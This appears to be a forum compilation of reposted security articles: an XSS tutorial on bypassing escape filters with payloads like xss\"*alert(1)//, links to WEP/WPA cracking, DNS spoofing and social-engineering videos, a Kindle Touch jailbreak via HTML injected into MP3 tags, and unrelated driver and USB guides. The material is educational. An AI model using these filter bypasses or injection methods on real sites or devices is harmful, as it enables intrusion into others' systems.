[h=1]Escaping Escapes[/h] April 20, 2011 By Justin Barron 2 Comments Sometimes a server will escape special characters that are injected: For instance, injecting a " character and having it reflect as \": Injection: xss" Reflection: [INDENT]x="[U][B]xss[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT] Fail. Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this: Injection: xss\" Reflection: [INDENT]x="[U][B]xss\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT] Success! However, if the server escapes your injected \ as \\, this technique will not work: Injection: xss\" Reflection: [INDENT]x="[U][B]xss[/B][/U]\[U][B]\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT] Not fun. If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax: Injection: xss\"*alert(1)*\" Reflection: [INDENT]x="[U][B]xss\[/B][/U]\[U][B]"*alert(1)*\[/B][/U]\[U][B]"[/B][/U]";y=42; [/INDENT] The *\\ following alert(1) is not valid syntax and will cause an error. So… Injection: xss\"*alert(1)// Reflection: [INDENT]x="[U][B]xss\[/B][/U]\[U][B]"*alert(1)//[/B][/U]";y=42; [/INDENT] Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do. Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works. Sursa: https://blog.whitehatsec.com/escaping-escapes/

Device Driver Development for Beginners - Reloaded by Evilcry » Mon Oct 04, 2010 6:14 am Hi, This is just a little starter for people interested in starting Kernel-Mode Development By following an good thread on UIC forum, opened by a beginner that wanted to know how to start with Device Driver Development, I remembered that long time ago published a similar blog post on that subject. Now I'm going to Reload and Expand it. Development Tools 1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be dowloaded http://www.microsoft.com/whdc/DevTools/WDK/WDKpkg.mspx 2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by a such advanced IDE, especially in presence of complex device drivers. 3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it http://ddkwizard.assarbad.net/ 4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it http://wholetomato.com/ 5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide http://visualddk.sysprogs.org/quickstart/ 6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox. Building a Driver Development Environment As you can see, a good comfortable Driver Development station is composed by a good amount of components, so we need an installation order. 1. Install your IDE - VisualStudio2008 or VisualStudio2010 2. Install WDK package 3. Install DDKWizard 4. Download and place ( usually into C:\WinDDK ) ddkbuild.cmd 5. By following DDKWizard pdf you will be driven to add an new Envirnment Variable directly releated to the OS version in which you are developing and successively add a reference of ddkbuild.cmd into VS IDE. DDWizard Manual is very well written. 6. After finishing DDKWizard integration you can test if your environment is correctly installed, by compilig your first driver. Steps are easy open VS and select DDKWizard templare (not EmptyDriver), you will see the skeleton of a Driver, all what you have to do is to Build Solution and Verify if No Compiling Errors occur, your station is correctly installed. 7. Install VirtualMachine 8. Integrate Debugging help of VisualDDK by following step by step quick start guide 9. Install Visual Assist (this can be done in every moment after VS Installation) Additional Tools * DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and ( a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it http://www.osronline.com/article.cfm?article=97 * IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed. In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of static portion of the IRP and an interpreted view of the current and previous stack locations. Download it http://www.osronline.com/article.cfm?article=199 * DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it http://www.osronline.com/article.cfm?article=99 * DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. x86 architecture. Dowload it http://www.osronline.com/article.cfm?article=157 Now you have a full working Develop and Debug Station. As you should imagine, dealing with driver development implies working with at Kernel Mode, a task pretty challenging, delicate and complex. A badly written driver lead to OS Crash and/or dangerous bugs, just think about a driver used in mission-critical applications like Surgery, a bug or a crash could lead to extremely big dangers. The driver need to be: * Bug Free * Fault Tolerant * Ready to Endure all Stress Situations This could be done, only by the driver coder, with a large knowledge of following fields: * Hardware Architecture * Operating System Architecture * Kernel and User Mode Architecture * Rock Solid C language knowledge * Debugging Ability Here i'm going to enumerate necessary Documentation/Book/Etc. necessary to acheive a *good and solid* background and advanced knowledge about driver coding. Microsoft WDK Page: http://www.microsoft.com/whdc/devtools/WDK/default.mspx Will give you informations about: 1. WDM ( Windows Driver Model) 2. WDF (Windows Driver Foundation) 3. IFS Kit (Installable FileSystem Kit) 4. Driver Debugging 5. Driver Stress Testing ( DriverVerifier tool ) PC Fundamentals: http://www.microsoft.com/whdc/system/default.mspx Device Fundamentals: http://www.microsoft.com/whdc/device/default.mspx This will give you an large view of 'what mean developing a driver' which components are touched and which aspects you need to know. It's also obviously necessary to have a Reference about kernel mode involved Functions and Mechanisms, the first best resource is always MSDN, here the starter link to follow MSDN->DDK http://msdn.microsoft.com/en-us/library ... 85).aspx How to start Learning As pointed out in the previous blog post, one of the best starting point, that will give you an on-fly-view of development topics is the Toby Opferman set of articles: Driver Development Part 1: Introduction to Drivers http://www.codeproject.com/KB/system/driverdev.aspx Driver Development Part 2: Introduction to Implementing IOCTLs http://www.codeproject.com/KB/system/driverdev2.aspx Driver Development Part 3: Introduction to driver contexts http://www.codeproject.com/KB/system/driverdev3.aspx Driver Development Part 4: Introduction to device stacks http://www.codeproject.com/KB/system/driverdev4asp.aspx Driver Development Part 5: Introduction to the Transport Device Interface http://www.codeproject.com/KB/system/driverdev5asp.aspx Driver Development Part 6: Introduction to Display Drivers http://www.codeproject.com/KB/system/driverdev6asp.aspx It's really important to put in evicence MemoryManagement at KernelMode, the best starting point for these aspects are tutorials written by four-f; http://www.freewebs.com/four-f/ Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/ ... a/IRPs.doc Book Resources Tutorial are a great starting point, but a solid understanding is given by a set of 'abstracts', emerges the necessity of a good Book Collection: Windows NT Device Driver Development (OSR Classic Reprints) http://www.amazon.com/Windows-Device-De ... 242&sr=8-2 Windows-Internals-Including-Windows-PRO-Developer http://www.amazon.com/Windows®-Int ... 160&sr=8-1 The Windows 2000 device driver book: a guide for programmers http://www.amazon.com/Windows-2000-Devi ... 0130204315 Windows NT/2000 Native API Reference http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1 Undocumented Windows 2000 Secrets http://undocumented.rawol.com/ Developing Drivers with WDF http://www.microsoft.com/whdc/driver/wdf/wdfbook.mspx Windows NT File System Internals, A Developer's Guide http://oreilly.com/catalog/9781565922495 Web Resources The first and most important resource about Windows Driver Development is OSROnline: http://www.osronline.com/ I strongly suggest you to subscribe: 1. The NT Insider 2. NTDEV MailingList 3. NTFSD MailingList NDIS Developer's Reference http://www.ndis.com/ Information, Articles, and Free Downloads http://www.hollistech.com/resources.htm The Undocumented Functions http://undocumented.ntinternals.net Blog MSDN http://blogs.msdn.com/iliast Windows Vista Kernel Structures http://www.nirsoft.net/kernel_struct/vista/ Peter Wieland's thoughts on Windows driver development http://blogs.msdn.com/b/peterwie/ USB Driver Development http://blogs.msdn.com/b/usbcoreblog/ Hardware and Driver Developer Blogs http://www.microsoft.com/whdc/resources/blogs.mspx Developer Newsgroups • microsoft.public.development.device.drivers • microsoft.public.win32.programmer.kernel • microsoft.public.windbg KernelmodeInfo Blog CURRENT_IRQL j00ru//vx tech blog Coding, reverse engineering, OS internals Blog http://j00ru.vexillium.org/ Nynaeve http://www.nynaeve.net/ DumpAnalysis Blog http://www.dumpanalysis.org/ Analyze -v Blog http://analyze-v.com/ Instant Online Crash Dump Analysis http://www.osronline.com/page.cfm?name=analyze Winsock Kernel (WSK) http://msdn.microsoft.com/en-us/library/ff571084.aspx Transport Driver Interface (TDI) http://msdn.microsoft.com/en-us/library/ms819740.aspx Network Driver Interface Specification (NDIS) http://blogs.msdn.com/b/ndis/ System Internals http://www.microsoft.com/whdc/system/Sysinternals/default.mspx Driver development needs too many time patience and experience to be fully understood, in my opinion the best approach remains LbD ( Learning by Doing ) so, read, study and develop as many experience you build less BSODs and "trange behavior" you will obtain See you to the next post, Giuseppe 'Evilcry' Bonfa

Din pacate in spaniola, dar poate va sunt utile: BackTrack 5 sacar claves wep WIFI (HD) http://www.youtube.com/watch?v=aUqeynUsRHQ BackTrack 5 claves wep con Filtrado MAC (HD) http://www.youtube.com/watch?v=MEwLAWoE7VY BackTrack 5 claves WPA (HD) Part 1 http://www.youtube.com/watch?v=NCU65dolhI0 BackTrack 5 claves WPA (HD) Part 2 http://www.youtube.com/watch?v=yFOehkT-CNE Sursa: Videos de Cracking WEP Y WPA Backtrack 5 Español

Web Services Hacking and Hardening Adam Vincent, Sr. Federal Solutions Architect The following presentation will NOTbe a vendor Pitch but will hopefully educate the audience in Web Services Hacking, Testing,and Hardening Techniques. Real life examples may be offered that relate to deployment of Layer 7 Technologies product line. Hardening of Web Services will have some focus on technologies like those Layer 7 Technologies provides. Layer 7’s product will be used as an example in this portion of the presentation. •Components and Terminology •Web Services Threats •Web Services Hacking •Web Services Hardening •Conclusion and Questions Download: https://www.owasp.org/images/d/d0/Web_Services_Hacking_and_Hardening.pdf

[h=4]Dns Spoofing With Ettercap Cli[/h] Description: Download Video Good Resolution from Mediafire : http://adf/.ly/4A0QY (10.25 MB) Sursa: [Xhabie-Crew] Dns Spoofing With Ettercap Cli

[h=4]Social Engineering Toolkit Megaprimer Part 1[/h] Description: In this oportunity I want to start a new series of video tutorials about the Social Engineering Toolkit, trying to cover the most important or used modules. This video will give an introduction to some concepts related to social engineering and the basic of this toolkit. Sursa: Social Engineering Toolkit Megaprimer Part 1

[h=2]Kindle Touch (5.0) Jailbreak/Root and SSH[/h][h=3]December 10, 2011[/h][h=3]Yifan Lu @ 1:32 am[/h] So long story short, we can run custom code on the Kindle Touch now but because the operating system has changed so much from Kindle 3, most Kindle modifications will not run without changes. I hope developers will jump to this device now that it’s unlocked. See the bottom of the post for download links. The directions for using are in the readme. Keep reading for technical details on how this came about. Obtaining the root image Before we can look for vulnerabilities in the system that would allow us to break in, we need to break into the system and obtain the files that might contain vulnerabilities. Yes, this is a chicken-and-egg problem, but fortunately Amazon is nice enough to help us with this. On every Kindle device is a TTL serial port. I found this port on the bottom of the device when the cover is opened. Fortunately, I did not even have to mess with it, as hondamarlboro and ramirami both managed to get the dump before me. Once we have the root image, it was only a matter of painstakingly looking through all the files to see possible injection vectors. Looking for the needle At first, I was digging deep into the system, disassembling and maping out various native libraries, looking for stack overflows (I found a couple but none could be accessed efficiently). I found the bootloader was unlocked but it would be a pain and danger for users (and even developers) to flash custom kernels and such. I also found that the Java code (the Kindle’s entire GUI is written in Java) is NOT obfuscated (which means it would be easier to reverse and later modify) and Amazon has left in many places to place plugins. For example, once someone has the time to figure things out, it would be very possible to write a EPUB extension to read EPUBs from the native reader. There are some other hidden secrets in the device too. The Kindle Touch has an accelerometer and proximity sensor (and a mic, but we know that) but they aren’t used in the software (yet). The more I looked into the system, I was aware that because it was such a huge rewrite, I had misjudged when I assumed that it would be harder to break as Amazon had years to fix the holes now. In fact, I would say that the Kindle 4 is more secure until I found out that Amazon left in SSH in diagnostics mode. Anyways, as I searched up the complexity chain from the bootloader to the kernel to the libraries to the Java interface, I found something very curious. Much of the operating system is no longer written in Java, but are now in HTML5 and Javascript. In fact, many of the interfaces on the Touch are actually web pages in disguise. For example: the password entry screen, the search bar, the browser (is just an HTML page with a frame), the Wifi selection screen, and even the music player. Obviously, these can’t all run natively in HTML and JS, or the device will be even slower (and it is pretty damn slow). What Amazon did is write a couple of Javascript hooks that are implemented by native libraries and events are read by these libraries and they perform actions accordantly. In short, Javascript will run native code. This is a goldmine, there could be many possible ways of using this to our advantage. There could be buffer overflows, heap overflows, string formatting bugs, etc. However, I didn’t have to look though much before I found a curious function: nativeBridge.dbgCmd();. It seems too good to be true. This function takes any shell command, and runs it (as root). Yup. The web browser will run as root, any command given to it. Don’t go looking for remote code execution yet (although it is highly possible), as the native bridge seems to be disabled when in web browser mode (it may be able to be bypassed, but I haven’t looked into it). Calling the debug function So the normal browser (as the one you can enter URLs into) can’t make use of this native bridge. However, as I’ve mentioned, a large part of the GUI in the Kindle Touch is HTML and JavaScript. All we need to do is inject some HTML into one of these and we would be all set. We need something that takes input and displays it to the user. The first thing I thought of was the media player. The Kindle displays the song title, artist, and album name in the music player, so what if we put some HTML into the ID3 tag? Yup, it works. How about some javascript? Running. Let’s try to call the debug function. It works. Well, that was a freebie. Having some fun That was a bit too easy and I was disappointed that I didn’t get to talk about how I whipped out IDA Pro and did some master debugging. So, let’s make things harder. We can use a MP3 with custom ID3 tags to execute any command, but how can we make this into a cool one-click solution? First of all, we should limit ourselves to one file to copy. Why make the user keep track of MP3s and shell scripts and where to put them? I took the shell script payload (which installs a developer key into the device so custom packages can be installed) and placed it into the comments section of the ID3 tag in the MP3. Then I used “dd” to extract the script, chmod it, and execute it. Now, another problem in terms of user friendliness is how to let the user know that the process was successful? I quickly whipped up an awesome looking “splash screen” and planned on displaying it while the magic is taking place. At first I tried to encode it into a variable in the shell script payload and extract it, but it was too slow and memory intensive. Instead, I took the image, raw, and appended it into the end of the MP3 (after all, the file was a bit too small). You can see the result in the video attached. What’s next? Just because the device is jailbroken does not mean it can now magically do anything you want. What needs to happen first is that developers need to take the device and write some code for it. This first jailbreak is really for these developers. For regular users, the only use is to preemptively unlock your device now in case the method is patched in an update or something. No mods for older Kindles will work as-is on the Touch. I’ve included a VERY basic usbnetwork package that will allow you to have SSH access to the device. I think that’s as good of a starting point as anything. From there, developers should be able to rip the root filesystem, test modifications, and write useful tweaks. (And in case of a brick, read my previous post on the bootloader access). Some things I would have to see or do is GUI plugins in the device’s operating system. The Java code is easy to decompile and read as the variable names have not been stripped out (like previous models). Hopefully people can write some reader plugins (like X-Ray) or even format plugins for other ebook formats. Being a touch screen device, one could also write games or useful apps (although the speed and eink are limiting). I need to finish writing the update creation tool so developers can package their modifications. Download Download the jailbreak here Simple custom screensaver mod Demonstration Sursa: Yifan Lu | Kindle Touch (5.0) Jailbreak/Root and SSH

[h=1]DIY: Create multi-boot USBs with ease[/h] By Jack Wallen December 10, 2011, 10:30 PM PST Takeaway: Get instructions on how to use XBoot or UNetbootin to have a USB stick with more than one operating system. When you want to have a single USB stick with multiple operating systems, the end result must be a reliable USB drive that contains the operating systems you need. Here’s how to do this with two tools: XBoot (using Windows 7) and UNetbootin (from within Linux). Both are simple, but the Linux version requires more manual work. [h=2]XBoot in Windows 7[/h] Requirements XBoot ISOs of the operating systems you want Instructions Download and run XBoot on your Windows 7 machine. To run XBoot, just unzip the downloaded file, change into the newly created directory, and double-click the .exe to run the software. When you run the software, you will see the main window (Figure A). Figure A [h=6]The operating systems listed will not show up on your XBoot window unless you installed them.[/h] To add ISO images, open Explorer and drag and drop the ISOs into XBoot. Some ISO images (e.g., Fedora 16) are automatically recognized. When you drag an unrecognized ISO into XBoot, a new window will appear (Figure B) where you must select the ISO (or the closest distribution) from a drop-down. For example, I selected Ubuntu for Bodhi Linux and Puppy Linux for MacPup. After you select the correct version from the drop-down, click Add This File. Figure B [h=6]XBoot window when you drag an unrecognized ISO into it.[/h] After all ISOs are added (make sure their combined size does not exceed that of the USB drive), click the Create USB button near the bottom right corner of the main window. Once this completes the process, you can reboot the machine (making sure it will boot from a USB device) and enjoy your multiboot on a stick. [h=2]UNetbootin from within Linux[/h] Requirements UNetbootin ISOs to be installed Instructions Download the UNetbootin tool for Linux. From a terminal window, give the downloaded file executable permissions with the command chmod u+x unetbootin-linux-XXX (where XXX is the architecture). Run UnNetbootin with the command ./unetbootin-linux-XXX (where XXX is the architecture). From the main window, select the distribution you want to install or use a downloaded ISO. After UNetbootin completes the install of the first OS, reboot the machine to test the OS on the USB drive. Now it gets a little tricky. You must copy everything from the USB drive to a new directory on your hard drive. Then, repeat the steps above, selecting the next OS you want on the USB drive. Now open two file manager windows: one to the USB drive and one to the newly created directory containing all the files from the first install you did on UNetbootin. You want to copy everything from the hard drive to the USB drive except the following: vesamenu.c32 ubnpathl.txt ubnkern ubninit ubnfilel.txt syslinux.cfg ldlinux.sys In the folder on your desktop, you must open the syslinux.cfg file. From that file, copy the last four lines and paste them in the syslinux.cfg file on the USB drive. Those lines will look like this: label ubnentry0 menu label DISTRIBUTION kernel /vmlinuz append initrd=/initrd.gz pmedia=cd where DISTRIBUTION is the name of the distribution you originally installed. You must copy the above four lines between the “label ubnentry1? and “label ubnentry2? entries. Make sure to relabel the “ubnenetryX” entries so they are in consecutive numerical order. After you make the necessary edits, close and save the file and reboot the system. You should now have a multi-boot USB drive that is in working order. Wth a large enough USB drive, you can carry around any number of operating systems that serve numerous purposes. Sursa: DIY: Create multi-boot USBs with ease | TechRepublic

Foarte probabil fake.